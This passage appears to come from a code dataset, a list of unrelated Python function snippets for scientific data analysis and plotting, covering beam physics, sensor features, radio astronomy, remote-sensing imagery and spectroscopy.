+element.M2\n\n # Check whether this element is an undulatorself.\n if isinstance(element, Undulator):\n count_UND += 1\n # The phase space distribution along the bunch before and after the\n # bunch.\n ps_s_before = beam_property_along_s(ps_before, id_slices)\n ps_s_after = beam_property_along_s(ps_after, id_slices)\n\n label1 = 'Before UND '+str(count_UND)\n label2 = 'After UND '+str(count_UND)\n save_name = 'Natural_focusing_in_UND'+str(count_UND)\n plt.figure()\n plt.plot(zplot[0:-1], ps_s_before[3,:]*gamma, label = label1)\n plt.plot(zplot[0:-1], ps_s_after[3,:]*gamma, label = label2)\n plt.grid()\n plt.legend()\n plt.savefig(save_name)\n ## End if\n\n ps_before = ps_after\n\n return", "def get_individual_manipulated_feature_centered(record,sensor,bins=100):\r\n \r\n #accesses the record's motion sensor\r\n ana=Analysis()\r\n ana.processRecord(record) \r\n motion=MotionProfileV2.extract(record)\r\n m = motion.vpsInDistance.toArray(sensor)\r\n \r\n #initializes variables\r\n my_range = np.linspace(-1,25,bins)\r\n d = 
np.zeros((len(my_range),1))\r\n prev=0\r\n index=0\r\n \r\n #iterates through the linspace vector\r\n for i in range(0,len(my_range)): \r\n cp=np.zeros((len(m),2))\r\n count=0\r\n \r\n #makes a copy of the values that fall within the given bin\r\n for j in range(0,len(m)):\r\n if m[j][0]+ ((25-record.motion.vehicleLength)/2-m[0][0]) >= my_range[i] and m[j][0]+ ((25-record.motion.vehicleLength)/2-m[0][0]) <= my_range[i+1]:\r\n cp[count][0]=m[j][0] + ((25-record.motion.vehicleLength)/2-m[0][0])\r\n cp[count][1]=m[j][1]\r\n count+=1\r\n\r\n #if there ARE changes within the bin (sensor switches from 0 or 1)\r\n if cp[0][0] != 0:\r\n \r\n #if there is ONLY ONE switch within the bin\r\n if cp[1][0] == 0:\r\n \r\n #if the sensor switches from 1 to 0\r\n if prev == 1:\r\n #finds the area\r\n d[index] = 1 - ((my_range[i+1] - cp[0][0])/(my_range[i+1]-my_range[i]))\r\n #increments the index and updates 'prev' accordingly\r\n index+=1\r\n prev=cp[0][1]\r\n \r\n #if the sensor switches from 0 to 1 \r\n else:\r\n #finds the are\r\n d[index] = ((my_range[i+1] - cp[0][0])/(my_range[i+1]-my_range[i]))\r\n #increments the index and updates 'prev' accordingly\r\n index+=1\r\n prev=cp[0][1]\r\n \r\n #if there are MORE than one switch within the bin \r\n else:\r\n value=0 \r\n #if the sensor switches from 1 to 0 then back any number of times\r\n if cp[0][1] == 1:\r\n #iterates through the copied matrix\r\n for j in range(0,len(cp),2):\r\n \r\n #finds the cumulative area\r\n if j+1<len(cp):\r\n if cp[j+1][0] == 0 and cp[j][0] != 0:\r\n value += my_range[i+1]-cp[j][0]\r\n prev=cp[j][1]\r\n else:\r\n value += cp[j+1][0] - cp[j][0]\r\n \r\n #adds the total area within the bin to the vector \r\n d[index] = value/(my_range[i+1]-my_range[i])\r\n index+=1\r\n \r\n #if the sensor switches from 0 to 1 then back any number of times \r\n else: \r\n #iterates through the copied matrix\r\n for j in range(0,len(cp),2):\r\n \r\n #finds the cumulative area\r\n if j+1<len(cp):\r\n if j == 0:\r\n value += cp[j][0] - my_range[i]\r\n prev=cp[j][1]\r\n elif cp[j][0] == 0 and cp[j-1][0] != 0:\r\n value += my_range[i+1]-cp[j-1][0]\r\n prev=cp[j-1][1]\r\n else:\r\n value += cp[j][0] - cp[j-1][0]\r\n \r\n #adds the total area within the bin to the vector \r\n d[index] = value/(my_range[i+1]-my_range[i])\r\n index+=1\r\n \r\n #if there ARE NOT changes within the bin (sensor stays either 0 or 1)\r\n elif cp[0][0] == 0:\r\n \r\n #changes the 'prev' variable accordingly and increments the index \r\n if prev == 0:\r\n d[index] = 0\r\n index+=1\r\n elif prev == 1:\r\n d[index] = 1\r\n index+=1\r\n \r\n #returns the individual sensor feature vector\r\n return(d)", "def dimension_along(self, axis):\n l, u = self._range_along(axis)\n return u - l", "def orient_shapes_hwd(data, slice_axis):\n if slice_axis == 0:\n return np.array(data)[[2, 1, 0]]\n elif slice_axis == 1:\n return np.array(data)[[2, 0, 1]]\n elif slice_axis == 2:\n return np.array(data)", "def __analyze(self):\n\n\t\t'''\n\t\ttodo: bSlabList.analyze() needs to step through each edge, not slabs !!!\n\t\t'''\n\n\t\tfor edgeIdx, edge in enumerate(self.edgeDictList):\n\t\t\tlen2d = 0\n\t\t\tlen3d = 0\n\t\t\tlen3d_nathan = 0\n\n\t\t\tslabList = edge['slabList']\n\t\t\tfor j, slabIdx in enumerate(slabList):\n\n\t\t\t\tx1 = self.x[slabIdx]\n\t\t\t\ty1 = self.y[slabIdx]\n\t\t\t\tz1 = self.z[slabIdx]\n\n\t\t\t\t#print('pointIdx:', pointIdx)\n\t\t\t\torig_x = self.orig_x[slabIdx]\n\t\t\t\torig_y = self.orig_y[slabIdx]\n\t\t\t\torig_z = self.orig_z[slabIdx]\n\n\t\t\t\tif 
j>0:\n\t\t\t\t\tlen3d = len3d + self.euclideanDistance(prev_x1, prev_y1, prev_z1, x1, y1, z1)\n\t\t\t\t\tlen2d = len2d + self.euclideanDistance(prev_x1, prev_y1, None, x1, y1, None)\n\t\t\t\t\tlen3d_nathan = len3d_nathan + self.euclideanDistance(prev_orig_x1, prev_orig_y1, prev_orig_z1, orig_x, orig_y, orig_z)\n\n\t\t\t\t# increment\n\t\t\t\tprev_x1 = x1\n\t\t\t\tprev_y1 = y1\n\t\t\t\tprev_z1 = z1\n\n\t\t\t\tprev_orig_x1 = orig_x\n\t\t\t\tprev_orig_y1 = orig_y\n\t\t\t\tprev_orig_z1 = orig_z\n\n\t\t\tedge['Len 2D'] = round(len2d,2)\n\t\t\tedge['Len 3D'] = round(len3d,2)\n\t\t\tedge['Len 3D Nathan'] = round(len3d_nathan,2)\n\n\t\t\t# diameter, pyqt does not like to display np.float, cast to float()\n\t\t\tmeanDiameter = round(float(np.nanmean(self.d[edge['slabList']])),2)\n\t\t\tedge['Diam'] = meanDiameter", "def yy(self):\n return self.exterior[:, 1]", "def axis_data(axis):\n x = mask.sum(axis)\n trimmed_front = N.trim_zeros(x,\"f\")\n offset = len(x)-len(trimmed_front)\n size = len(N.trim_zeros(trimmed_front,\"b\"))\n return offset,size", "def __calculateDDIstart(self, partedscans, partedspws):\n \n # Example of partedspws:\n # create 2 subMss with spw=0,1,2 and spw=3\n # partedSPWs = {0:['0','1','2'],1:['3']}\n #\n # create 3 subMSs with spw=0,1,2 spw=3 and spw=4,5\n # partedSPWs = {0:['0','1','2'],1:['3'],2:['4','5']}\n \n hasscans = True\n if len(partedscans) == 0:\n scans = ''\n hasscans = False\n\n # It needs to take the correlation selection into account\n corr_sel = self._arg['correlation']\n ddistartList = []\n \n # scan+spw separation axis \n if hasscans:\n count = 0\n for k,spws in partedspws.iteritems():\n for ks,scans in partedscans.iteritems():\n if self._msTool is None:\n self._msTool = mstool()\n self._msTool.open(self._arg['vis'],nomodify=False)\n else:\n self._msTool.reset()\n \n try:\n # The dictionary with selected indices\n seldict = self._msTool.msseltoindex(vis=self._arg['vis'],scan=scans,spw=spws,polarization=corr_sel)\n except:\n self._msTool.close()\n continue\n \n # Get the selected DD IDs\n ddis = seldict['dd'].tolist()\n ddsize = ddis.__len__()\n if count == 0:\n ddistart = 0\n \n # Create a ddistart list\n ddistartList.append(ddistart)\n ddistart = ddistart + ddsize\n count = count + 1\n \n # spw separation axis \n else:\n count = 0\n for k,spws in partedspws.iteritems():\n if self._msTool is None:\n self._msTool = mstool()\n self._msTool.open(self._arg['vis'],nomodify=False)\n else:\n self._msTool.reset()\n \n try:\n # The dictionary with selected indices\n seldict = self._msTool.msseltoindex(vis=self._arg['vis'],scan=scans,spw=spws, polarization=corr_sel)\n except:\n self._msTool.reset()\n continue\n \n # Get the selected DD IDs\n ddis = seldict['dd'].tolist()\n ddsize = ddis.__len__()\n if count == 0:\n ddistart = 0\n \n # Create a ddistart list\n ddistartList.append(ddistart)\n ddistart = ddistart + ddsize\n count = count + 1\n \n return ddistartList", "def data_separation(self, n_extrema=2, ind_extrema=[0,-1], verbosity=1):\n\n self.fullspace = []\n self.z_requested = np.array([self.z_requested]).flatten()\n\n ## fullspace: array of all multiindex values in the noiseless case \n for z in np.array(self.z_requested):\n for iind in (self.df_ext.loc[self.data_type,z].index):\n ## values of the redshift are only included, if there is data for multiple redshift values\n if self.multiple_z == False:\n self.fullspace.append(list(iind)[1::2])\n else:\n self.fullspace.append(np.array([z]+list(iind)[1::2]))\n self.fullspace=np.array(self.fullspace)\n\n 
self.size_fullspace = len(self.fullspace) \n self.ind_fullspace = np.array(range(self.size_fullspace))\n\n ## extremaspace: array of multiindex values of the spectra considered \"extrema\"\n self.ind_extremaspace = self.ind_fullspace[ind_extrema]\n self.extremaspace = self.fullspace[self.ind_extremaspace]\n self.size_extremaspace = len(self.extremaspace)\n\n ## midspace: array of all multiindex values except for the extrema\n self.ind_midspace = np.setdiff1d(self.ind_fullspace, self.ind_extremaspace)\n self.midspace = self.fullspace[self.ind_midspace]\n self.size_midspace = len(self.midspace)\n\n ## print details if verbosity >= level\n too.condprint(\"length of full sample space\", self.size_fullspace, level=2, verbosity=verbosity)\n too.condprint(\"full sample space list\", self.fullspace, level=3, verbosity=verbosity)\n too.condprint(\"length of extrema sample space\", self.size_extremaspace, level=2, verbosity=verbosity)\n too.condprint(\"full sample space list\", self.extremaspace, level=3, verbosity=verbosity)\n\n return None", "def intersection(self, axis2):", "def calc_axes(self):\n y_axis = np.linspace(0, self.image_shape[0] - 1, self.image_shape[0])\n x_axis = np.linspace(0, self.image_shape[1] - 1, self.image_shape[1])\n if hasattr(self, 'pixelsize'):\n y_axis *= self.pixelsize[0]\n x_axis *= self.pixelsize[1]\n return x_axis, y_axis", "def segment(data):", "def get_section_stats(bd, section_rows, section_cols, parameter_object, section_counter):\r\n\r\n if parameter_object.trigger in ['pantex', 'lac']:\r\n out_d_range = (0, 31)\r\n else:\r\n out_d_range = (0, 255)\r\n\r\n # Scale the data to an 8-bit range.\r\n if (bd.dtype != 'uint8') and (parameter_object.trigger not in parameter_object.spectral_indices):\r\n\r\n bd = np.uint8(rescale_intensity(bd,\r\n in_range=(parameter_object.image_min,\r\n parameter_object.image_max),\r\n out_range=out_d_range))\r\n\r\n # Apply histogram equalization.\r\n if parameter_object.trigger != 'dmp':\r\n\r\n if parameter_object.equalize:\r\n bd = equalize_hist(bd, nbins=256)\r\n\r\n elif parameter_object.equalize_adapt:\r\n \r\n bd = equalize_adapthist(bd,\r\n kernel_size=(int(section_rows / 128),\r\n int(section_cols / 128)),\r\n clip_limit=.05,\r\n nbins=256)\r\n\r\n if parameter_object.equalize or parameter_object.equalize_adapt:\r\n\r\n bd = np.uint8(rescale_intensity(bd,\r\n in_range=(0., 1.0),\r\n out_range=(0, 255)))\r\n\r\n # Remove image noise.\r\n if parameter_object.smooth > 0:\r\n bd = np.uint8(cv2.bilateralFilter(bd, parameter_object.smooth, 0.1, 0.1))\r\n\r\n # elif parameter_object.trigger == 'lbp':\r\n #\r\n # if parameter_object.visualize:\r\n # bdOrig = bd.copy()\r\n #\r\n # elif parameter_object.trigger == 'hough':\r\n #\r\n # # for display (testing) purposes only\r\n # if parameter_object.visualize:\r\n # bdOrig = bd.copy()\r\n #\r\n # # test canny and hough lines\r\n # if parameter_object.visualize:\r\n #\r\n # # for display purposes only\r\n # bdOrig = bd.copy()\r\n #\r\n # test_plot(bd, bdOrig, parameter_object.trigger, parameter_object)\r\n\r\n # Get the row and column section chunk indices.\r\n # chunk_indices = get_chunk_indices(section_rows,\r\n # section_cols,\r\n # parameter_object.block,\r\n # parameter_object.chunk_size,\r\n # parameter_object.scales[-1])\r\n\r\n func_dict = dict(dmp=dict(name='Differential Morphological Profiles',\r\n args=dict()),\r\n evi2=dict(name='Two-band Enhanced Vegetation Index',\r\n args=dict()),\r\n fourier=dict(name='Fourier transfrom',\r\n args=dict()),\r\n gabor=dict(name='Gabor 
filters',\r\n args=dict()),\r\n gndvi=dict(name='Green Normalized Difference Vegetation Index',\r\n args=dict()),\r\n grad=dict(name='Gradient magnitude',\r\n args=dict()),\r\n hog=dict(name='Histogram of Oriented Gradients',\r\n args=dict()),\r\n lac=dict(name='Lacunarity',\r\n args=dict(lac_r=parameter_object.lac_r)),\r\n lbp=dict(name='Local Binary Patterns',\r\n args=dict()),\r\n lbpm=dict(name='Local Binary Patterns moments',\r\n args=dict()),\r\n lsr=dict(name='Line support regions',\r\n args=dict()),\r\n mean=dict(name='Mean',\r\n args=dict()),\r\n ndvi=dict(name='Normalized Difference Vegetation Index',\r\n args=dict()),\r\n pantex=dict(name='PanTex',\r\n args=dict(weight=parameter_object.weight)),\r\n orb=dict(name='Oriented FAST and Rotated BRIEF key points',\r\n args=dict()),\r\n saliency=dict(name='Image saliency',\r\n args=dict()),\r\n seg=dict(name='Segmentation',\r\n args=dict()),\r\n sfs=dict(name='Structural Feature Sets',\r\n args=dict(sfs_threshold=parameter_object.sfs_threshold,\r\n sfs_skip=parameter_object.sfs_skip)))\r\n\r\n for idx in parameter_object.spectral_indices:\r\n if idx not in func_dict:\r\n func_dict[idx] = {'name': idx, 'args': {}}\r\n\r\n logger.info(' Processing {} for section {:,d} of {:,d} ...'.format(func_dict[parameter_object.trigger]['name'],\r\n section_counter,\r\n parameter_object.n_sects))\r\n\r\n other_args = func_dict[parameter_object.trigger]['args']\r\n\r\n if parameter_object.trigger in parameter_object.spectral_indices:\r\n trigger = 'mean'\r\n else:\r\n trigger = parameter_object.trigger\r\n\r\n return call_func(bd,\r\n parameter_object.block,\r\n parameter_object.scales,\r\n parameter_object.scales[-1],\r\n trigger,\r\n **other_args)\r\n\r\n # return Parallel(n_jobs=parameter_object.n_jobs_chunk,\r\n # max_nbytes=None)(delayed(call_func)(bd[chi[0]:chi[1],\r\n # chi[2]:chi[3]],\r\n # parameter_object.block,\r\n # parameter_object.scales,\r\n # parameter_object.scales[-1],\r\n # parameter_object.trigger,\r\n # **other_args) for chi in chunk_indices)\r", "def horde_step(self, observation):", "def _axes(self, X):\n \n return np.arange(len(X.shape) - 1) + 1", "def _filter_axes(self, channel_axis, spatial_axes):\n f_axes = ng.make_axis(length=self.nout, name=\"K\")\n for key, ax in zip(\"DHW\", spatial_axes):\n f_axes += ng.make_axis(length=self.filter_shape[key],\n name=ax.name)\n f_axes += channel_axis\n return f_axes", "def addSTDdevIndices(img):\n\t\t\timg = img.addBands(img.normalizedDifference(['green','swir1']).rename(['ND_green_swir1'])); # NDSI, MNDWI\n\t\t\timg = img.addBands(img.normalizedDifference(['nir','red']).rename(['ND_nir_red'])); # NDVI\n\t\t\timg = img.addBands(img.normalizedDifference(['nir','swir2']).rename(['ND_nir_swir2'])); # NBR, MNDVI\n\t\t\t\n\t\t\treturn img;", "def getAxis(self,axis):\n\n\t\tif axis == \"u\":\n\t\t\tif len(self.usr) != 0:\n\t\t\t\treturn np.append([0], self.usr)\n\n\t\tif axis == \"s\":\n\t\t\tif len(self.seg) != 0:\n\t\t\t\tif self.radiograph:\n\t\t\t\t\treturn self.seg\n\t\t\t\telse:\n\t\t\t\t\tfirst = self.seg[0] - 1.\n\t\t\t\t\treturn np.append([first], self.seg)\n\n\t\tif axis == \"c\":\n\t\t\tif len(self.cos) != 0:\n\t\t\t\tif self.radiograph:\n\t\t\t\t\treturn self.cos\n\t\t\t\telse:\n\t\t\t\t\tfirst = -1.\n\t\t\t\t\treturn np.append([first], self.cos)\n\n\t\tif axis == \"e\":\n\t\t\tif len(self.erg) != 0:\n\t\t\t\tfirst = self.erg[0] - 1.\n\t\t\t\treturn np.append([first], self.erg)\n\n\t\tif axis == \"t\":\n\t\t\tif len(self.tim) != 0:\n\t\t\t\tfirst = self.tim[0] - 1.\n\t\t\t\treturn 
np.append([first], self.tim)\n\n\t\tif axis == \"i\":\n\t\t\treturn self.cora\n\n\t\tif axis == \"j\":\n\t\t\treturn self.corb\n\n\t\tif axis == \"k\":\n\t\t\treturn self.corc\n\n\t\treturn []", "def setAxisParts(lowx='all', lefty='all', upx='ticks', righty='ticks'):\n partdict = {'none':'NONE','lines':'LINE','ticks':'TICKS',\n 'labels':'LABELS', 'all':'NAME'} \n dislin.setgrf(partdict[lowx], partdict[lefty],\\\n partdict[upx], partdict[righty])", "def noAxisSystem():\n dislin.nograf()", "def get_out_dims(section_rows, section_cols, parameter_object):\r\n\r\n bl = parameter_object.block\r\n sc = parameter_object.scales[-1]\r\n scale_block_diff = sc - bl\r\n\r\n out_rows = len(range(0, section_rows-scale_block_diff, bl))\r\n out_cols = len(range(0, section_cols-scale_block_diff, bl))\r\n\r\n return out_rows, out_cols", "def plot_autocorrs(self, axis=0, n_rows=4, n_cols=8):\n self.current_plot = 'multi'\n self.ax_zoomed = False\n \n bls = self.uv.d_uv_data['BASELINE']\n\n # Extract the relevant baselines using a truth array\n # bls = bls.tolist()\n bl_ids = set([256*i + i for i in range(1, n_rows * n_cols + 1)])\n bl_truths = np.array([(b in bl_ids) for b in bls])\n \n #print self.uv.d_uv_data['DATA'].shape\n #x_data = self.d_uv_data['DATA'][bl_truths,0,0,:,0,axis] # Baselines, freq and stokes\n #x_cplx = x_data[:,:,0] + 1j * x_data[:,:,1]\n\n x_cplx = self.stokes[axis][bl_truths]\n\n\n \n # Plot the figure\n #print self.uv.n_ant\n fig = self.sp_fig\n figtitle = '%s %s: %s -- %s'%(self.uv.telescope, self.uv.instrument, self.uv.source, self.uv.date_obs)\n for i in range(n_rows):\n for j in range(n_cols):\n ax = fig.add_subplot(n_rows, n_cols, i*n_cols + j +1)\n ax.set_title(self.uv.d_array_geometry['ANNAME'][i*n_cols + j], fontsize=10)\n #ax.set_title(\"%s %s\"%(i, j))\n \n x = x_cplx[i*n_cols+j::self.uv.n_ant]\n \n if self.scale_select.currentIndex() == 0 or self.scale_select.currentIndex() == 1:\n if x.shape[0] == self.uv.n_ant:\n self.plot_spectrum(ax, x, label_axes=False)\n else:\n self.plot_spectrum(ax, x, stat='max', label_axes=False)\n self.plot_spectrum(ax, x, stat='med', label_axes=False)\n self.plot_spectrum(ax, x, stat='min', label_axes=False)\n else:\n self.plot_spectrum(ax, x, label_axes=False)\n self.updateFreqAxis(ax)\n \n if i == n_rows-1:\n ax.set_xlabel('Freq')\n if j == 0:\n ax.set_ylabel('Amplitude')\n \n plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))\n plt.tick_params(axis='both', which='major', labelsize=10)\n plt.tick_params(axis='both', which='minor', labelsize=8)\n plt.xticks(rotation=30)\n \n plt.subplots_adjust(left=0.05, right=0.98, top=0.95, bottom=0.1, wspace=0.3, hspace=0.45)\n return fig, ax", "def test_find_dispersion_axis():\n dm = SlitModel()\n\n dm.meta.wcsinfo.dispersion_direction = 1 # horizontal\n assert find_dispersion_axis(dm) == 0 # X axis for wcs functions\n\n dm.meta.wcsinfo.dispersion_direction = 2 # vertical\n assert find_dispersion_axis(dm) == 1 # Y axis for wcs functions", "def fiber_alignment(config, ind=0):\n files = sorted(\n glob.glob(config['raw_dir'] + '/radiance/{}/data/data_*.txt'.format(\n config['date'])))\n\n # load data from txt file\n txt = np.genfromtxt(files[ind], delimiter='', skip_header=11)\n\n align = add_align()\n\n # extract pixels of alignment\n pixels = align['pixel'] + config['channel_pixel_adj']\n\n plt.figure(figsize=(12, 9), dpi=300)\n\n ax1 = plt.subplot2grid((2, 4), (0, 0), colspan=4)\n ax1.plot(txt[500, :], '-*')\n ax1.axis([0, 1060, 0, txt[500, :].max() + 20])\n for xc in pixels:\n plt.axvline(x=xc, 
color='r')\n plt.xlabel('pixels')\n plt.ylabel('counts')\n plt.title('Channel alignment')\n \n ax2 = plt.subplot2grid((2, 4), (1, 0), colspan=2)\n # First section\n ax2.plot(txt[500, :], '-*')\n ax2.axis([0, 200, 0, txt[500, :].max() + 20])\n for xc in pixels:\n plt.axvline(x=xc, color='r')\n plt.xlabel('pixels')\n plt.ylabel('counts')\n plt.title('Initial section')\n\n ax3 = plt.subplot2grid((2, 4), (1, 2), colspan=2)\n # final section\n ax3.plot(txt[500, :], '-*')\n ax3.axis([800, 1060, 0, txt[500, :].max() + 20])\n for xc in pixels:\n plt.axvline(x=xc, color='r')\n plt.xlabel('pixels')\n plt.ylabel('counts')\n plt.title('Final section')\n\n plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)\n plt.show()", "def system_fleet_dimensioning(self):", "def test_offsets():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n sections2 = ((B, H, 12.435, E),)\n EI, top, bot = bm.EI(sections, E)\n EI2, top2, bot2 = bm.EI(sections2, E)\n assert 0.99 < EI / EI2 < 1.01\n assert 0.99 < top / top2 < 1.01\n assert 0.99 < bot / bot2 < 1.01", "def plot_section(file_handle, xq, ax, data1, data2,im=250, eta='e',yvar='yh', rep='pcm', xlim=(0,650), ylim=(-2000,0), cmap=plt.cm.bwr, hidex=False, hidey=False, m1=-2, m2=2):\n font = {'family': 'serif',\n 'color': 'darkred',\n 'weight': 'normal',\n 'size': 18,\n }\n\n e = file_handle.variables[eta][-24::,:,:,im].mean(axis=0) # Vertical grid positions\n y = file_handle.variables[yvar][:]\n x,z,q = m6toolbox.section2quadmesh(xq, e, data1, representation=rep) # This yields three areas at twice the model resolution\n #cs = ax.pcolormesh(x, z, q,norm=LogNorm(vmin=1, vmax=110), cmap=cmap)\n cs = ax.pcolormesh(x, z, q, vmin=m1, vmax=m2, cmap=cmap)\n if (len(data2.shape)>1):\n z = 0.5*(e[0:-1,:]+e[1:,:])\n [Y,TMP] = np.meshgrid(y,z[:,0])\n s = ax.contour(Y,z,data2-1000,[37.1],colors='gray',lw=10)\n ax.clabel(s, inline=1, fontsize=16,fmt='%4.2f', manual=[(500,-500)])\n else:\n print 'data2 will not be plotted!'\n #ax.plot(y,data2,'gray',lw=2);\n\n ax.set_ylim(ylim)\n ax.set_xlim(xlim)\n if not hidex:\n #ax.axes.get_xaxis().set_ticks([])\n ax.set_xlabel('y [km]')\n\n if not hidey:\n #ax.axes.get_yaxis().set_ticks([])\n ax.set_ylabel('Depth [m]')\n\n return cs", "def dimensions():", "def _ul_lr(self):\n ulx, xres, xskew, uly, yskew, yres = self.geotransform\n # Index from the end - GDal usually orders bands-first:\n lrx = ulx + (self.array.shape[-2] * xres)\n lry = uly + (self.array.shape[-1] * yres)\n return ulx, uly, lrx, lry", "def autoidentify(self, rstep=1, istart=None, nrows=1, oneline=True):\n #update the line list such that it is only the line list of selected lines\n if self.wp:\n slines=np.array(self.wp)\n sfluxes=np.zeros(len(slines))\n for i in range(len(slines)):\n try:\n sfluxes[i]=self.sfluxes[self.slines==slines[i]][0]\n except:\n if sfluxes.mean()==0: \n sfluxes[i]=1\n else:\n sfluxes[i]=sfluxes.mean()\n \n else:\n slines=self.slines\n sfluxes=self.sfluxes\n \n iws=ai.AutoIdentify(self.xarr, self.specarr, slines, sfluxes, self.ws, farr=self.farr,method=self.method, rstep=rstep, istart=istart, nrows=nrows, res=self.res, dres=self.dres, mdiff=self.mdiff, sigma=self.sigma, niter=self.niter, dc=self.dc, ndstep=self.ndstep, oneline=oneline, log=self.log, verbose=self.verbose)\n if oneline:\n self.ws=iws\n else:\n return iws", "def prepare(self):\n if self.pin.lower() == \"homo\":\n for i,line in enumerate(self.x):\n self.x[i] = [x - self.Lead_HOMOs_xval[i] for x in line]\n elif self.pin.lower() == \"lumo\":\n for i,line in enumerate(self.x):\n self.x[i] = 
[x - self.Lead_LUMOs_xval[i] for x in line]\n elif \"vac\" in self.pin.lower():\n for i,line in enumerate(self.x):\n self.x[i] = [x - self.vacuum[i] for x in line]\n elif \"ef\" in self.pin.lower():\n for i,line in enumerate(self.x):\n self.x[i] = [x - self.fermi_levels[i] for x in line]", "def test():\n\n file = 'crosssection.dat'\n f = open(file,'r')\n lines = f.readlines()\n nline = len(lines)\n points = np.zeros(shape=(nline,4))\n sigtable = np.zeros(nline)\n for i in range(nline):\n points[i,0] = float(lines[i].split()[0])\n points[i,1] = float(lines[i].split()[1])\n points[i,2] = float(lines[i].split()[2])\n points[i,3] = float(lines[i].split()[3])\n sigtable[i] = float(lines[i].split()[4])\n\n nbin = 60\n npts = nline/nbin\n\n # checking lensing cross section against magnitude\n '''\n for i in range(npts):\n plt.plot(points[i*nbin:(i+1)*nbin,3],sigtable[i*nbin:(i+1)*nbin])\n plt.show()\n '''\n npts = npts/nbin\n\n # checking lensing cross section against velocity dispersion\n '''\n for i in range(nline):\n mask, = np.where((points[:,1]==points[i,1])&(points[:,0]==points[i,0])\\\n &(points[:,3]==points[i,3]))\n vel = points[mask,2]\n sigma = sigtable[mask]\n plt.plot(vel,sigma)\n plt.show()\n '''\n\n # checking lensing cross section against lens redshift\n #'''\n for i in range(3000,nline):\n mask, = np.where((points[:,1]==points[i,1])&(points[:,2]==points[i,2])\\\n &(points[:,3]==points[i,3]))\n print mask\n zl = points[mask,0]\n sigma = sigtable[mask]\n plt.plot(zl,sigma)\n plt.show()\n #'''\n\n # checking lensing cross section against source redshift\n for i in reversed(range(nline)):\n mask, = np.where((points[:,0]==points[i,0])&(points[:,2]==points[i,2])\\\n &(points[:,3]==points[i,3]))\n print mask\n zs = points[mask,1]\n sigma = sigtable[mask]\n plt.plot(zs,sigma)\n plt.show()", "def section_linearization(self,strain):\r\n\t\tcentroidal_axis = self.depth*0.5\r\n\t\treturn self.sectional_force(strain),\\\r\n\t\t\tself.sectional_moment(strain,centroidal_axis)", "def getDimensions():", "def getVerticalIntegrated(ds, okMap=None, normalization=-1, axis=1, cluster=(0.0,'None'),top=None,bottom=None):\n print 'vertical integration of', ds.title\n start_dim = ds.ndim\n\n if (okMap is not None) and (okMap.ndim != 2):\n raise AttributeError('okMap.ndim != 2')\n\n # check shape\n if (okMap is not None) and (ds.shape != okMap.shape):\n raise AttributeError('ds.shape != okMap.shape') \n\n # JRH strategy: we need to sum vertically, accumulating individual pixel\n # errors as we go, and counting the contributions.\n #\n # The okmap should give us contributions by summing vertically\n # Note that we are assuming at least 0.1 count in every valid pixel\n \n import time\n if bottom is None or bottom < 0: bottom = 0\n if top is None or top >= ds.shape[0]: top = ds.shape[0]-1\n working_slice = ds[bottom:top,:]\n totals = working_slice.intg(axis=axis)\n contrib_map = zeros(working_slice.shape,dtype=int)\n contrib_map[working_slice>-1] = 1 #Disabled\n contribs = contrib_map.intg(axis=axis)\n #\n # We have now reduced the scale of the problem by 100\n #\n # Normalise to the maximum number of contributors\n print 'Axes labels:' + `ds.axes[0].title` + ' ' + `ds.axes[1].title`\n max_contribs = float(contribs.max())\n #\n print 'Maximum no of contributors %f' % max_contribs\n contribs = contribs/max_contribs #\n save_var = totals.var\n totals = totals / contribs #Any way to avoid error propagation here?\n totals.var = save_var/contribs\n\n # finalize result\n totals.title = ds.title\n 
totals.copy_cif_metadata(ds)\n info_string = \"Data were vertically integrated from pixels %d to %d (maximum number of contributors %d).\\n\" % (bottom,top,max_contribs)\n \n # check if any axis needs to be converted from boundaries to centers\n new_axes = []\n for i in range(totals.ndim):\n if len(totals.axes[i]) == totals.shape[i] + 1:\n new_axes.append(getCenters(totals.axes[i]))\n else:\n new_axes.append(totals.axes[i])\n print 'Axis %d: %s' % (i,totals.axes[i].title)\n old_names = map(lambda a:a.name,totals.axes)\n old_units = map(lambda a:a.units,totals.axes)\n old_names[-1] = 'Two theta'\n old_units[-1] = 'Degrees'\n totals.set_axes(new_axes,anames=old_names,aunits=old_units)\n \n # Finally, cluster points together if they are close enough\n\n if cluster[0] > 0:\n totals,extra_info_string = debunch(totals,cluster)\n info_string += extra_info_string\n \n axislist = map(lambda a:a.title,totals.axes)\n print 'Axes: ' + `axislist`\n\n totals.add_metadata(\"_pd_proc_info_data_reduction\",info_string,append=True)\n\n # normalize result if required\n if normalization > 0:\n rescale(totals,normalization)\n return totals", "def extract_kernel_and_coords(spec_ds,x,y,width,height,band,transform):\r\n xoffset = int(x - transform[0])/30 - width/2\r\n yoffset = int(y - transform[3])/-30 - height/2\r\n\r\n x_indeces = numpy.arange(xoffset, xoffset+width)\r\n y_indeces = numpy.arange(yoffset, yoffset+height)\r\n x_coords = x_indeces * transform[1] + transform[0] \r\n y_coords = y_indeces * transform[5] + transform[3] \r\n all_coords = numpy.zeros([x_coords.size,y_coords.size,2])\r\n for ind, i in enumerate(x_coords):\r\n for jnd, j in enumerate(y_coords):\r\n all_coords[jnd,ind] = (i,j) \r\n\r\n # plot is outside the image boundary\r\n if xoffset <0 or yoffset > spec_ds.RasterYSize - 1:\r\n return [-9999]\r\n this_band = spec_ds.GetRasterBand(band)\r\n specs = this_band.ReadAsArray(xoffset, yoffset, width, height)\r\n return specs, all_coords", "def dim_calculator():\r\n probe_set = np.arange(1, 101)\r\n X = -36 + ((probe_set - 1) // 10) * 4\r\n Y = 2 - ((probe_set - 1) % 10) * 4\r\n dim = np.vstack((X, Y)).T\r\n return dim", "def _get_indice(cls, w, flux, blue, red, band=None, unit='ew', degree=1,\n **kwargs):\n wi, fi = cls.continuum_normalized_region_around_line(w, flux, blue,\n red, band=band,\n degree=degree)\n if unit in (0, 'ew', 'EW'):\n return np.trapz(1. - fi, wi, axis=-1)\n else:\n m = np.trapz(fi, wi, axis=-1)\n m = -2.5 * np.log10(m / np.ptp(wi))\n return m", "def _get_indice(cls, w, flux, blue, red, band=None, unit='ew', degree=1,\n **kwargs):\n wi, fi = cls.continuum_normalized_region_around_line(w, flux, blue,\n red, band=band,\n degree=degree)\n if unit in (0, 'ew', 'EW'):\n return np.trapz(1. 
